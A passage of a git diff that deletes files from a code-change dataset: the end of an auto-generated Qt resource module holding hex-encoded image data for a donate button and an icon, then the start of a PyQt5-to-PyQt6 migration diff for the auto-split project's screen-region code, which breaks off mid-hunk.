-\x32\x9a\x44\x8b\xe1\x13\x7b\x26\x33\x87\x66\x91\x0a\x84\xe0\xdf\ -\x14\x2a\xec\x4e\xeb\x64\x9f\x82\xb2\xdc\xba\xa9\xb5\xee\x03\x3b\ -\xfa\x8d\x25\x0e\x01\x92\x54\x00\x89\x7e\x3e\x03\xdb\x37\x1b\x76\ -\x6e\xce\xc6\xfd\xbe\x1c\xbb\x47\x7c\xf6\x8c\xf8\xa9\xad\xb1\x50\ -\x01\xc7\xe3\x65\x42\x70\x4b\x92\xd7\x4d\x54\x29\xeb\x90\x2d\xd2\ -\xe5\x9b\x0b\xd5\xf4\x8c\xc1\xde\x51\x9f\x1d\xd5\xf4\x5d\xff\x2e\ -\xd6\xc6\x21\x40\x56\xd6\xd3\x6b\xa4\x84\x5b\x67\x0c\xe5\x62\xb6\ -\x3f\xa3\xdb\x99\xf5\x98\x56\x2d\x88\x72\xa1\x50\x61\xbb\x90\x7c\ -\xfd\xd8\xd6\xe4\xc2\x80\x44\x04\x71\xd5\xd6\xdf\xd7\x78\x65\x9e\ -\xed\xa5\x90\x6f\xe9\x4e\x8b\xb9\x65\xbc\x85\x93\x72\xd6\x7f\x35\ -\x71\x23\x50\x06\x87\xdb\xf7\x00\x6b\xa1\x56\xb1\x1c\xdc\x63\xb2\ -\x30\xdc\xe9\xca\x6b\x05\x36\x95\x22\xf6\x8f\xa5\x37\x44\xa4\x50\ -\x45\x29\x87\x7f\x3b\x7f\x82\xc9\xa4\xae\x99\x98\x25\x36\x9a\x82\ -\x54\x7c\x63\xb1\x42\x25\x8d\x7e\x7f\x01\xdc\x3c\xe6\xb3\x29\x63\ -\x93\x63\xb5\x89\xb7\x01\x87\x11\x6b\x61\xcf\x76\xcb\xe6\x4d\x36\ 
-\xd5\xca\xbf\xf5\x12\xbf\x23\x6d\xb6\xa4\x94\x1c\x76\x0a\xe0\x16\ -\x79\xa6\x80\xe7\x41\x32\x5e\x40\x62\xa2\x28\x04\x7b\x1c\x8f\x17\ -\xa5\x71\xb0\x67\x7c\x90\x44\xc4\xcc\x68\x3b\x53\x96\xa8\x7b\x26\ -\x60\xdb\x27\x13\xf3\x0f\x7b\x8d\xe3\xc4\xc9\xbf\x42\xea\x3d\xa7\ -\xeb\xa3\xbb\x3d\x7c\x70\xbc\x85\x2b\x93\x57\x01\x52\x81\x57\x65\ -\x4c\x2a\xee\xd2\x61\x32\x5b\xf4\x7d\x57\x00\x33\x87\x66\x91\x0e\ -\x08\xc1\x2b\xbd\x12\xbb\xd3\x28\xfc\x51\x02\x0e\x4c\xb4\x53\x8b\ -\xef\xae\x84\xd6\x02\x3f\x48\xee\x4c\xc0\xa4\xb0\x16\x36\x8d\x5a\ -\x6e\xde\x95\xed\xe4\xdf\x25\xeb\x06\x76\xd6\x02\xb6\x55\xd2\xf1\ -\x02\xbc\x32\x28\x8f\x97\x0a\x99\xcc\xf0\xd0\x44\x3c\x80\xa8\x4d\ -\x4d\xba\xbc\xb2\x50\xc5\x49\xfa\x90\x0f\x0b\x8c\x15\xa2\xf8\x04\ -\x9f\x64\x2f\xbd\xbe\x7b\xa3\xe3\x73\x01\x87\x0d\x0b\xec\xbb\xc9\ -\x30\x31\x9a\xbd\xbd\xff\xab\x51\x50\x96\xfd\xe3\xed\x54\xb6\x05\ -\x1d\x0f\xdc\x22\x7b\x85\x4c\x26\x0c\xe8\xab\x02\x58\xa9\xfc\x93\ -\xec\x77\x3c\xee\x4c\x63\xdc\x97\x14\x71\xec\x5f\xcb\xd8\xd1\x51\ -\x5d\xc2\x68\x38\x15\x40\xc1\x85\xdb\x66\x0c\x4e\x16\xb5\xee\x55\ -\xb0\xc0\xf6\x6a\xc0\xd6\x4a\x90\xf8\x3b\x23\x04\x14\x2a\x54\xa4\ -\xe2\x95\x3a\xa4\xef\xa5\x72\x7d\xf7\x00\x84\x04\x21\x78\xae\x57\ -\x62\x3a\x69\xf7\xbf\x1b\xfb\xef\xce\xd0\x41\x11\x17\xdc\x1b\xe2\ -\xf8\x7f\xd8\x14\x80\xb1\xb0\x75\xca\xb2\x7b\xfb\xe0\x59\xff\x2e\ -\x9e\xb4\xdc\x3c\xea\xe3\xa5\x90\x0b\x70\x8b\xa0\x5c\x9e\x2b\x24\ -\xdb\xa0\xbf\x5e\x40\xdf\x15\x80\x0e\x28\x49\x87\x97\xba\xa5\xe4\ -\x3b\x0f\x05\x71\x81\x47\xd6\x0e\x8e\x5c\x4d\x3b\x48\xf6\x50\xd0\ -\x24\x10\xc0\x2d\x09\x8f\xfd\xea\x35\x16\xd8\x5a\x0d\x99\x2c\x45\ -\x89\x17\x69\xa9\x38\x0c\xd8\x27\x24\xcf\xee\xf7\xb5\xfa\xa6\x00\ -\x56\xed\xfd\xef\x74\x3c\x9e\x9d\xb4\xfb\x1f\x67\x74\x35\xbb\x32\ -\x1a\xfb\x77\x09\x02\x56\x86\x6c\x0c\x03\xd6\x42\xb5\x6c\xb9\x65\ -\x26\xfb\x7b\xff\x57\xa3\xa8\x0c\xbb\x47\x7c\x54\xc2\xdb\xd6\x42\ -\x80\x57\xa2\x2c\x25\x5f\xa7\x43\xfa\xda\x3f\x99\x44\x08\xf0\x1c\ -\xa7\xc8\xce\x34\xb2\xff\x3b\x6b\x01\x13\x3d\x3c\xc1\xb7\x1f\x04\ -\x11\x89\x76\x02\xf6\x1b\x6b\x61\x67\x67\xec\xd7\xa0\x7f\x2c\x01\ -\xec\xa8\x06\x54\x53\xe8\x18\x75\x4b\xa0\x5c\x9e\x27\x24\x9b\xfa\ -\x79\x9d\xbe\x2a\x80\x85\xa7\x10\x52\xf2\x1c\xaf\x48\x31\x69\x0b\ -\x57\x54\x96\x3d\x23\x01\x2a\xe3\x66\xa8\xd5\x16\x89\x9e\x0a\xdc\ -\x6f\x94\x8a\x93\x7f\xa5\x0c\x1c\xed\x76\xa3\x74\xab\x47\x77\x54\ -\x93\xf7\x22\x95\x07\x4e\x81\xfd\x42\x70\x2b\xf4\x2f\x0f\xd0\x57\ -\x05\x30\x3a\xcd\x98\x74\xb8\xd3\x49\x78\x14\xbb\xb5\x30\x59\x0a\ -\x99\x2c\x65\xa7\xe6\x7f\xcd\x75\xd2\x39\x11\x28\xcb\x8b\xbc\x96\ -\xcf\x93\xa1\xb1\x5f\xbd\x42\x89\xd8\x93\xf4\x12\xde\x12\x94\x12\ -\xdc\x12\xe3\x42\xf2\xdc\x52\x1f\x3b\x67\xfb\x1b\x02\x08\x76\x39\ -\x1e\xfb\x92\x9e\xf7\x2f\x65\x3a\x0f\xed\x5a\xb1\xc4\x1e\xc0\x30\ -\x29\x80\xbd\x3b\x6d\x26\xc6\x7e\xf5\x92\xa9\x72\xc4\xa6\x62\xf2\ -\xc9\x40\xb7\x88\x94\x0e\x2f\x68\x2c\xd0\xb7\xfa\xd9\xbe\x28\x80\ -\x99\x43\xb3\xdd\xa3\xa0\x9e\xed\x14\xd8\x9c\xe4\xd0\xcf\x6e\xf2\ -\x2f\x0d\xb7\xed\x9a\xd7\x3a\x64\x9d\x80\x9e\x0b\xcf\xb8\x59\x67\ -\x66\xec\x57\x2f\xe8\x9e\x2c\xb4\xbd\x1a\x24\x9e\xa8\x75\x3c\x70\ -\x5c\x0e\x20\x98\xee\xd7\x35\xfa\xe6\x01\xf8\x0d\xa4\x50\xdc\xe1\ -\x16\x49\xbc\xf3\x7f\x73\x39\xa4\xe6\x65\xdf\x0d\x35\x16\x9a\xed\ -\xe1\xe8\x04\xec\x8e\xfd\xda\x9b\xc1\xb1\x5f\x37\x8a\x00\xb6\x56\ -\x42\x4a\x09\xcf\x90\x90\x0e\x28\x8f\x5d\x42\x70\xb0\x6f\xd7\xe8\ -\xd7\x0f\x56\x1e\x35\xe9\x70\x47\xd2\xf1\xbf\x12\xf1\xc3\xca\x52\ -\xcb\xef\xe5\x88\x22\x56\x8e\xd3\x1a\x06\x0e\x66\x74\xec\xd7\x8d\ -\xd2\x2d\x27\x9f\x28\x26\x5b\xb1\x25\x04\xb8\x45\xaa\x42\xc6\x72\ 
-\xd4\x8f\x44\x60\xdf\x14\x80\x10\x4c\x2b\x87\x5d\x49\x9e\xf8\x63\ -\x81\xb2\x63\x98\x2a\x65\xbf\xb4\x4e\x00\x61\x24\xf0\x87\xa0\x13\ -\xd0\x12\x1f\x36\x7a\x6b\x46\xc7\x7e\xf5\x82\x82\xb2\x6c\x29\x87\ -\x89\x3f\x2a\xa7\x80\x90\x0e\x77\xb4\x97\xfa\xe3\x49\xf7\xe7\x79\ -\xc5\xb3\xe6\xf6\x3a\x1e\x9b\x45\x92\xf1\xa0\x85\xf1\x62\x94\xd9\ -\xba\xff\x8b\x89\x34\x04\xd1\xe0\x77\x02\x5a\x03\xdb\xa7\xb3\x3f\ -\xf6\xeb\x46\x10\xc0\xe6\x4a\x98\x78\x83\x90\x72\x41\x39\x1c\x90\ -\xaa\x3f\xf5\x00\x3d\x57\x00\x33\x87\x66\x51\x0a\x84\xe4\xa0\xe3\ -\x51\x4d\x32\x71\x22\x44\x1c\xff\xa7\xd1\xcb\x7d\x3d\x68\x13\x2b\ -\x81\x41\x67\x50\xc6\x7e\xdd\x28\xe3\x05\x9d\x78\x59\xb9\x8a\xf3\ -\x00\xdb\x11\xfd\xe9\x0b\xe8\x8b\x07\xd0\xae\xe3\x48\xc5\xad\xaa\ -\x90\xac\x47\xe8\x4a\xcb\x64\x29\x1a\x18\x8b\xaa\x75\xb2\x47\x82\ -\xf5\x83\x41\x1a\xfb\x75\x43\x9f\x13\x28\x3a\x86\xe9\x72\x82\xe7\ -\xb8\x13\x37\xd3\x29\x97\x51\x21\xd9\xdb\x0f\x63\xda\x17\x01\x95\ -\x8a\x8a\x74\x98\x49\x72\xee\xbf\x05\x2a\xae\x61\xac\x30\x18\x26\ -\x35\xce\x01\x0c\xbe\x07\xd0\x1d\xfb\xb5\x65\x40\xc6\x7e\xdd\x08\ -\x12\x98\x2c\x45\x89\x57\x97\x3a\x1e\x25\x29\x99\xe9\x47\x42\xbd\ -\x2f\x0a\x40\x08\x26\x94\xc3\x76\x95\x70\xfc\x3f\xe2\xe9\x54\x8e\ -\xf7\xbe\x5e\x82\x50\xa0\x13\x3a\x13\xb0\x5f\x38\x0e\xdc\x7e\xb3\ -\xc1\x1b\x90\xb1\x5f\x37\xca\xa6\x62\x94\xf8\x76\xa0\x72\x40\x28\ -\x6e\x6e\xcc\xf5\xbe\xa3\xb6\x3f\x0a\x40\xb2\x59\x3a\x4c\x26\x39\ -\xfc\x53\x88\x58\x3b\x3b\x03\x12\xff\x43\x3c\x0b\x40\x9b\xc1\x95\ -\x7f\x6b\x61\xd3\xd8\xe0\x8d\xfd\xba\x11\xca\xae\xa1\xe6\x26\xeb\ -\xb6\x49\x17\xa4\x62\x9b\x74\xe9\xf9\x3c\xed\x9e\x8b\x68\xe7\xb4\ -\x99\x6d\xca\x4d\x76\xfa\xaf\x12\x96\xf1\xe2\xe0\xc4\xff\xd0\x51\ -\x00\x03\x1c\x02\x58\x60\xff\x80\x8e\xfd\xba\xde\xcf\x5b\x90\x86\ -\xf1\x84\xeb\x01\xa4\x02\xa9\xd8\x21\x25\x63\x3d\xff\xd9\xbd\xfc\ -\x61\x33\x87\x66\x51\x1e\x20\xd9\x23\x9d\xe4\x8e\x38\x8a\x13\x34\ -\x96\x51\x6f\xb0\xa4\xc9\x0f\x44\x62\x67\x02\xf6\x83\x82\x1b\x67\ -\xff\xb3\xde\x71\xd9\x4b\xa4\x80\xb1\x82\x4e\xf4\xec\x00\x29\x41\ -\x39\x8c\x21\x98\x80\xde\xee\x04\xf4\xdc\x46\x9f\xfc\x32\x42\x4a\ -\xb6\x2b\x37\x59\x63\x5c\x76\x0c\x25\x67\xb0\xd2\x50\x7e\x98\xfc\ -\x2c\x80\x6e\x43\x8b\xeb\x72\x43\x2f\x71\x3c\xf6\xcb\xb0\x7b\xdb\ -\xc6\xb0\xfe\xab\x19\x2d\xe8\x44\x2b\x4d\x85\x00\xe9\x30\x2a\x24\ -\x53\xbd\xfe\xd9\x3d\x4f\x2a\x8c\xdf\x44\x51\x48\x76\x25\xd9\x00\ -\x84\x8d\x1b\x80\xbc\x14\xcf\x79\xbf\x1e\xfc\x20\x16\xc8\x24\x0e\ -\xe8\xb4\x16\x5c\x15\xc7\xec\x07\xf7\x18\xaa\x65\xcb\xc7\x3e\xe3\ -\xd0\xf2\xaf\x2f\x07\x21\x80\x83\x7b\xec\x40\x8f\xfd\xba\x5e\x2a\ -\x8e\xa1\xa0\x0c\x81\x51\xc9\x58\x39\x01\x52\x51\x80\xd8\x03\xe8\ -\x25\x3d\x57\x00\x02\x4a\xd2\x61\x2a\xd1\x1d\x00\x11\x0f\x6e\x50\ -\x03\x50\xff\xdf\xc5\x00\x2d\xbf\xbf\xaf\x4f\xd7\xda\x97\x4b\xb0\ -\x6b\x8b\xe1\x19\xfb\x0c\x07\xf6\x18\xa6\xc7\x2d\x87\x8f\x48\xcc\ -\x75\x26\x20\xe3\xb1\x5f\xb1\xfb\x2f\x18\xee\xe2\x9f\xb5\x28\x3a\ -\x86\xa2\x63\x59\x4e\xb0\x24\x40\x2a\x5c\x29\xe3\xce\x5a\xdd\xc3\ -\x14\x44\xef\x15\x80\xa4\x26\x25\x53\x49\x96\x00\x4b\x01\x35\x6f\ -\xb0\x5e\x46\x63\xa1\xd5\x8e\xd7\xdb\x4b\x35\xd0\xb5\xf6\x8e\x82\ -\xc9\xb1\x78\x38\xc7\xed\xfb\x0c\xbb\xb6\x1a\x2a\x9d\xac\x8c\x00\ -\x5a\x9d\x59\x84\xd7\x75\x0d\x0b\xbb\xb6\x1a\xb6\x4d\x0d\xfe\xd8\ -\xaf\x6b\xfe\xec\xc4\x05\x67\x15\xc7\x70\xa6\xd7\x0f\xef\x0a\x48\ -\x85\x14\x92\xe9\x5f\x7b\x35\xfc\xc4\x3d\xbd\xfb\xb9\xbd\xdf\xbd\ -\x15\x54\xa5\x43\x25\xc9\x12\x60\x47\x58\xaa\x09\x6f\xcd\xdc\x28\ -\xc6\x74\x3c\x80\x1e\xbd\x44\x5d\x6b\x5f\x2c\xc0\xce\x2d\x86\x3b\ -\xf6\x1b\x6e\xd9\x6b\x98\x1c\xb3\x38\xb2\xa3\x18\x56\x7d\x7f\xb3\ 
-\x25\xae\x3b\xff\xd0\x1d\xfb\x55\xf4\x06\x47\xe1\xf6\x12\x25\x2d\ -\x25\x37\xc1\xfd\xdb\x38\x07\x80\x90\x6c\xfa\xe1\xdf\x47\x56\x27\ -\x7b\xa7\x77\x7b\xa6\x00\x56\x0e\x01\x11\x8c\x0a\x49\x25\xa9\x9b\ -\x63\x01\x47\x5a\xca\xee\x60\xd9\xa2\xf8\x54\xe0\x1b\xff\xec\xd6\ -\x82\x23\x61\xbc\xb3\x1f\x7f\xc7\x7e\xc3\x9e\xed\x86\x6a\xe9\xfc\ -\xf7\x98\x35\xfe\x5d\xbd\x75\x7d\xa3\xc8\xac\x85\x89\x51\xcb\xfe\ -\xdd\x83\x75\xbf\x7b\x89\x00\x2a\x8e\x4e\x2e\xcb\xdd\xcd\x13\x09\ -\xc6\xbd\x0a\x0e\xd0\xb3\xe3\x64\xfb\xe3\x01\x48\xbc\x24\x3d\x80\ -\x82\xb2\xa9\x1c\xe0\x70\x23\x58\x0b\xc1\x75\xc6\x90\x17\xc7\xf6\ -\xb7\xdd\x6c\x38\xb0\xdb\x30\x35\x6e\x71\xd5\xa5\xd6\x7e\xad\x7f\ -\xdf\x1d\x45\x76\xad\xcf\xc9\x5a\xd8\xbb\xc3\x30\x39\xbe\xf1\x92\ -\x7f\x5d\x04\xe0\x29\x9b\x68\xc8\x29\x14\x48\xc9\x88\x94\x78\x64\ -\x55\x01\x74\x5e\xa6\x11\xa1\xfa\x7f\xa4\xd1\x0a\x16\x0a\xca\x0c\ -\xd4\x0e\x80\x20\x8e\xbf\x83\x70\xfd\x65\xc0\xd6\x76\xbc\x9d\x4e\ -\x6c\x7f\x70\x4f\x27\xb6\xdf\x12\x77\xe1\x75\x6e\xc5\xba\x7c\x43\ -\xcb\xf9\x51\x64\xd7\xaa\xa7\x3d\x17\x6e\xdf\x67\x70\xe5\xfa\xae\ -\x35\xac\x94\x1c\x83\x14\x16\x6d\x93\xb1\x74\x42\xc4\xf9\x35\x21\ -\x29\x00\xf5\x5e\xfd\xdc\xde\x7a\x00\xb1\x4a\x2c\x0a\x91\x7c\x17\ -\xe0\x20\xed\x00\x40\x2c\xfc\x7e\x78\x75\x01\xec\x5a\xfb\x4a\xd9\ -\xb2\x7b\x9b\xe5\xf6\x7d\x86\x03\x37\x19\x36\x8d\x5a\x94\xbc\xba\ -\xb5\x5f\x0b\xa3\xa1\x7d\x1d\xf9\x07\xd3\x1d\xfb\x35\xc0\x47\x7e\ -\xf5\x8a\x82\xb2\x48\x01\x3a\xa1\x1b\xd1\xa9\xb0\x2d\x41\x6f\x8d\ -\x6b\x4f\x15\x80\x54\x60\x2c\x55\x21\xfb\x7b\x9a\xc9\xc5\xb8\xca\ -\x0e\xdc\xc9\x3a\x7e\x10\x9f\x0a\xb4\x16\x5d\x6b\xef\xaa\x58\xe0\ -\x6e\xd9\x6b\xb8\xfd\x66\xc3\xce\x2d\x71\xe2\x0d\xd6\x6f\xed\x2f\ -\xa6\xdb\x85\xd8\x6c\x73\x5d\x49\xac\x83\x7b\x86\x73\xec\xd7\xb5\ -\xe2\x4a\x8b\x92\x96\xd0\x24\xf4\xe2\xc5\x0a\xa0\x8c\xa0\xa7\x3d\ -\x81\xbd\x0d\x01\x24\x20\x70\x45\x92\x43\x6e\x44\xfc\x30\xc4\x00\ -\xbd\x92\x02\x68\x07\xf1\x48\xb0\xd5\x74\xad\x7d\xb5\x1c\x1f\xac\ -\x79\xc7\x7e\xc3\xfe\x9b\x0c\xe3\x23\x16\x25\x62\x81\xef\xc5\xa7\ -\x0c\x22\x41\xdb\xbf\xf6\x87\x54\x2e\xc4\x7b\xff\x92\x8d\xed\xfe\ -\x43\x9c\x78\x96\xf4\x7e\x1b\xf7\x72\x08\x01\x48\x5c\x41\x6f\x8d\ -\x6b\x6f\x3d\x80\x38\x2e\x74\x49\x78\xca\x95\x12\x83\xe7\x01\x68\ -\x2d\x56\x1a\x81\x8c\x89\xdb\x6a\x37\x4f\x58\x6e\x9d\x89\x63\xfb\ -\x1d\x9b\x0d\x45\xf7\xbc\x8b\xdf\x4b\x81\x8b\xa2\xb8\x0c\xf9\x5a\ -\x30\x06\xb6\x6f\x1e\xee\xb1\x5f\xd7\x82\x12\x16\x99\x70\xd8\x29\ -\x62\xf7\xbf\xa7\xb3\x01\x7b\xeb\x01\x28\x40\x24\xdf\x1b\x92\xf4\ -\xe1\x8d\xbd\xc0\x98\xce\xd1\x53\x95\x38\xb6\xbf\xe3\x40\xc7\xda\ -\xd7\xe2\xd8\xd2\xd0\x3f\x2b\x1b\x46\x10\x5e\xa3\x02\x90\x32\xde\ -\xfb\x1f\xf6\xb1\x5f\xeb\x45\x88\x1b\xeb\xa5\xb8\xf6\x0b\x82\x90\ -\x08\x7a\x9c\x5f\xeb\xa9\x02\x28\x54\x20\x6c\xe1\x24\xed\x01\x08\ -\x06\xab\xa7\xde\x12\x2b\xad\x57\xbc\x20\xe2\xe0\x1e\xc3\xd6\x49\ -\x4b\xa1\x4f\xd6\xfe\x62\x04\x71\x01\x52\x78\x0d\xe5\xa4\xd6\xc2\ -\x68\xd5\x72\x60\xcf\x60\x55\x5b\xf6\x13\x29\x52\x39\xd1\x59\xd1\ -\x63\x99\xed\xe9\x0f\xeb\xc4\xb0\x89\xdf\x96\x41\x8a\xff\x21\x16\ -\xa0\x1d\x5b\x0c\xbb\xb7\xb3\x12\xdb\x27\x19\x53\x37\xdb\x10\x69\ -\xb1\xee\x17\xd8\x5a\xd8\xb3\x63\x63\x8c\xfd\x5a\x3f\x36\xf9\x11\ -\xe8\xa2\xf7\xb6\xae\xa7\x9f\xc1\xc4\x31\x6d\xe2\xd2\x38\x88\xe3\ -\x28\x5d\x27\xb6\x20\x69\x08\x54\xab\x2d\xae\x69\x10\x89\xe3\xc4\ -\xee\xff\x46\x19\xfb\xb5\x3e\x52\x31\x3b\x19\x57\x00\xb1\x5b\xa9\ -\x6d\xc2\xbb\x44\xdd\x6d\xb3\x9c\xf5\xd1\x1d\x45\xb6\x1e\x36\xe2\ -\xd8\xaf\xf5\x61\xd3\x31\x3b\x3d\xbe\x68\x4f\x15\x80\x8e\xfb\xdb\ -\x13\x3f\x93\x3b\xa9\x6a\xac\x61\x60\xa5\x0a\x70\x9d\xcf\xc8\xda\ 
-\x8d\x35\xf6\x6b\xbd\x58\x9b\xc2\x34\x27\x8b\xa1\xc7\x51\x58\x6f\ -\x15\x40\xec\x56\xb6\x6d\xc2\xa1\xa2\x36\xd7\xd7\xd8\xb2\x11\x31\ -\x40\xa3\xb5\xfe\x23\xc9\x8b\x85\xd8\xfd\xdf\x48\x63\xbf\xd6\xc3\ -\xf5\x54\x60\xde\xe8\x05\x3b\x72\xd5\xd3\xb6\xd7\x9e\x2a\x00\xab\ -\xc1\x5a\x7c\x92\x34\x16\x16\x42\x23\xd2\x72\xc8\x06\x0e\x63\xa0\ -\xd9\x5a\xe7\xf7\x5a\xd8\x3a\x69\xb9\x69\x03\x8e\xfd\xba\x1a\xc6\ -\xa6\xe2\x79\x46\x58\x7a\x3a\x86\xa4\xb7\x0a\x20\x2e\x55\x6b\x58\ -\xd3\x5b\x2d\x75\x35\x42\x33\xd8\xc3\x35\x93\xa4\x3b\x87\x60\x3d\ -\xb7\x4b\x00\x07\xf7\x9a\x0d\x39\xf6\xeb\x6a\xe8\x84\xdf\x39\x6b\ -\xc1\x1a\x42\x0b\x3d\x1d\x49\xdc\x5b\x05\x10\xff\xc7\x4f\x34\x04\ -\x10\xb1\x02\xd0\x66\xf0\x0f\xd9\xec\x37\xdd\x2e\xc4\xb6\x7f\xf5\ -\xef\x8d\xc7\x7e\xd9\x95\xb1\x5f\x39\x17\xe2\x6b\x99\xf8\x3b\x67\ -\x2d\x3e\x64\xd8\x03\xe8\xc4\x29\x4b\xc6\xf4\xae\x5f\x79\x3d\x04\ -\x5a\x10\xe5\x26\x6a\x5d\x84\xa1\xa0\x1d\x5c\xfd\xb5\x8d\xc7\x7e\ -\x59\xb6\x4e\x6e\xbc\xb1\x5f\xeb\xc1\xd7\x22\xb1\x4e\x40\x88\xbd\ -\x6b\x6b\x68\x60\x59\x67\x00\xb7\x3e\xfa\x51\xcb\xd0\xb0\x86\x20\ -\xc9\xa4\x5c\x64\x04\x51\x52\x5d\x59\x03\x4e\x10\xc5\x9d\x88\x57\ -\xbb\x5b\xdd\xb1\x5f\xa5\xbe\x9c\x4a\x3f\xf8\xb4\xb4\xc4\x24\x98\ -\x03\xb0\xb1\x71\x6d\xda\x1e\x1b\xd7\x9e\x2b\x00\x6b\xa9\x5b\x43\ -\x33\xa9\xa0\x51\x00\xa1\x91\xb4\xa2\x01\x6c\x08\x48\x18\x41\xdc\ -\x82\x7c\xb5\x51\x64\xd6\xc2\x58\x2d\x1e\xfb\x95\x3b\x56\x97\x62\ -\x81\x46\x28\x13\xbd\x37\xd6\x80\xd5\x9c\xb3\x36\xa3\x0a\xe0\xc8\ -\xdd\x6f\x8e\x17\x6a\xa9\x9b\x88\x66\xa2\x1e\x80\x85\x76\xae\x00\ -\xd6\x85\x1f\x5e\xda\x86\x7c\x31\xd6\xc2\xcc\xce\x8d\x3d\xf6\xeb\ -\x4a\x18\x0b\xf5\x40\x25\xba\xf5\xdc\x09\x01\xce\x45\x41\x96\x73\ -\x00\x00\x86\x86\xb5\x2c\xda\x04\x03\x47\x6d\x04\x8d\x5c\x01\xac\ -\x8b\xb6\x2f\x88\xf4\x95\x1b\x59\x3c\x17\x9e\xd1\x19\xfb\x95\x73\ -\x29\xa1\x91\x34\x42\x99\x68\xd7\x8b\x89\xc0\x5a\x4e\x9d\xf8\xbe\ -\x0c\xd7\x01\x00\x58\xf0\x8d\x66\x3e\xc9\x23\xaf\x62\x97\x4c\xe5\ -\xd6\x6a\x1d\xb4\xda\x57\x3e\x90\xd4\x5a\x98\x9e\xb0\xec\xc9\xc7\ -\x7e\xad\x89\x20\x4e\x00\x36\x13\x36\x38\x5a\xa3\x8d\xe1\xe4\x81\ -\xf7\xf7\xf6\xe7\xf6\xfc\x53\x98\x88\xb6\x35\x9c\xb2\x49\x56\x02\ -\x58\x58\x0a\x64\x5e\x12\xbc\x0e\x9a\xed\xab\x9f\x07\x90\x8f\xfd\ -\xba\x32\xcd\x50\xe2\x6b\x99\xe8\x16\xa0\x89\xf0\xad\xe1\xc9\x5e\ -\x9e\x0a\x04\x7d\x50\x00\xdb\x6f\x27\x34\x9a\x13\xbd\x5e\xe8\x15\ -\x11\xb1\x07\x10\xe8\xbc\x16\xe0\x4a\x58\x62\x0f\xe0\x72\x05\x2c\ -\x16\x28\x15\xcf\x8f\xfd\xca\x59\x9b\xe5\x50\x25\x37\x0b\x90\xd8\ -\x2b\xd3\x21\x4d\x2c\xa7\x7a\xfd\xb3\x7b\xfa\x9c\x8f\xdc\xfd\x66\ -\xe6\x9e\x00\x6b\x38\x61\xa2\x64\xab\x01\x1b\xa1\xa4\x19\xe6\xaf\ -\xed\x95\xb0\xc4\x1e\xc0\xe5\x92\x57\xd6\xc0\x8e\xcd\x86\x1d\x5b\ -\xf2\xec\xff\xe5\xb0\xc0\x42\x5b\x25\x5e\x03\x60\x22\xe6\xac\xc9\ -\xb8\x02\x80\x78\x26\x80\xb5\x9c\xd0\x11\xed\x64\x6e\x4f\x67\x7b\ -\x4b\x0b\x16\x83\x44\x87\x11\x0f\x1c\xc6\xc4\xc3\x40\x2e\xf7\xee\ -\x4a\x09\xb7\xee\x35\x94\x0b\x79\x7b\xf5\xe5\x88\x8c\xe0\x9c\xef\ -\x24\x7a\x83\x8c\x06\xa3\x39\x6b\x2d\xe7\xe0\xfc\x8e\x5b\x2f\xe8\ -\xbd\xc9\x8c\xdb\xa4\x4e\x99\x88\x46\x92\x3b\x01\x91\x15\xcc\xb5\ -\x9d\xfc\xc5\xbd\x02\xda\xc4\xc3\x40\xd6\xc2\xda\x78\x3e\x61\x77\ -\xec\x57\xce\xa5\x08\xa0\x19\x49\xce\xf9\x2a\xf1\x1d\x00\xa3\x39\ -\x6a\x74\xef\x0e\x04\xe9\xd2\x17\x9f\xd9\x1a\x4e\xe9\x90\x53\x49\ -\x2a\x00\x80\xb3\x2d\x07\x5f\xe7\xaf\xef\x5a\x08\xba\x8d\x40\x6b\ -\xff\x7d\x7c\xe4\x57\x3e\xf6\xeb\x6a\x2c\x07\x8a\x56\x94\x6c\x02\ -\x50\x87\x60\x34\x4f\x7c\xe3\x1b\x7a\x5f\x62\xdf\x1f\x05\x60\x39\ -\x67\x34\x27\x13\x4d\x04\x02\x8b\xbe\x43\x23\x54\xb9\x05\xbb\x0c\ 
-    [... pyrcc-generated hexadecimal byte data elided: the embedded PNG/ICO payloads for resources/donatebutton.png and icon.ico; nothing in the blob is human-readable ...]
-"
-
-qt_resource_name = b"\
-\x00\x09\
-\x0a\x6c\x78\x43\
-\x00\x72\
-\x00\x65\x00\x73\x00\x6f\x00\x75\x00\x72\x00\x63\x00\x65\x00\x73\
-\x00\x10\
-\x0a\x2c\xb7\x07\
-\x00\x64\
-\x00\x6f\x00\x6e\x00\x61\x00\x74\x00\x65\x00\x62\x00\x75\x00\x74\x00\x74\x00\x6f\x00\x6e\x00\x2e\x00\x70\x00\x6e\x00\x67\
-\x00\x08\
-\x0a\x61\x42\x7f\
-\x00\x69\
-\x00\x63\x00\x6f\x00\x6e\x00\x2e\x00\x69\x00\x63\x00\x6f\
-"
-
-qt_resource_struct = b"\
-\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
-\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x02\
-\x00\x00\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
-\x00\x00\x00\x3e\x00\x00\x00\x00\x00\x01\x00\x00\x3b\x83\
-"
-
-def qInitResources():
-    QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
-
-def qCleanupResources():
-    QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
-
-qInitResources()
diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$screen_region.py.diff b/v1/data/codefile/toufool@auto-split__86244b6__src$screen_region.py.diff
deleted file mode 100644
index 7707136..0000000
--- a/v1/data/codefile/toufool@auto-split__86244b6__src$screen_region.py.diff
+++ /dev/null
@@ -1,130 +0,0 @@
-diff --git a/src/screen_region.py b/src/screen_region.py
- index a43c20e4d2b01d4642956e22c666eb23b7e25471..86244b6c190f48200826788fa6af4bd8d26b230f 100644
- --- a/src/screen_region.py
- +++ b/src/screen_region.py
-@@ -1,5 +1,6 @@
--from PyQt5 import QtCore, QtGui, QtTest, QtWidgets
-+from PyQt6 import QtCore, QtGui, QtTest, QtWidgets
- from win32 import win32gui
-+from typing import cast, Callable
- import capture_windows
- import ctypes
- import ctypes.wintypes
-@@ -25,11 +26,11 @@ def selectRegion(self):
-     self.heightSpinBox.setValue(selector.height)
-
-     # Grab the window handle from the coordinates selected by the widget
--    self.hwnd = win32gui.WindowFromPoint((selector.left, selector.top))
-+    self.hwnd = cast(int, win32gui.WindowFromPoint((selector.left, selector.top)))
-     # Want to pull the parent window from the window handle
-     # By using GetAncestor we are able to get the parent window instead
-     # of the owner window.
--    GetAncestor = ctypes.windll.user32.GetAncestor
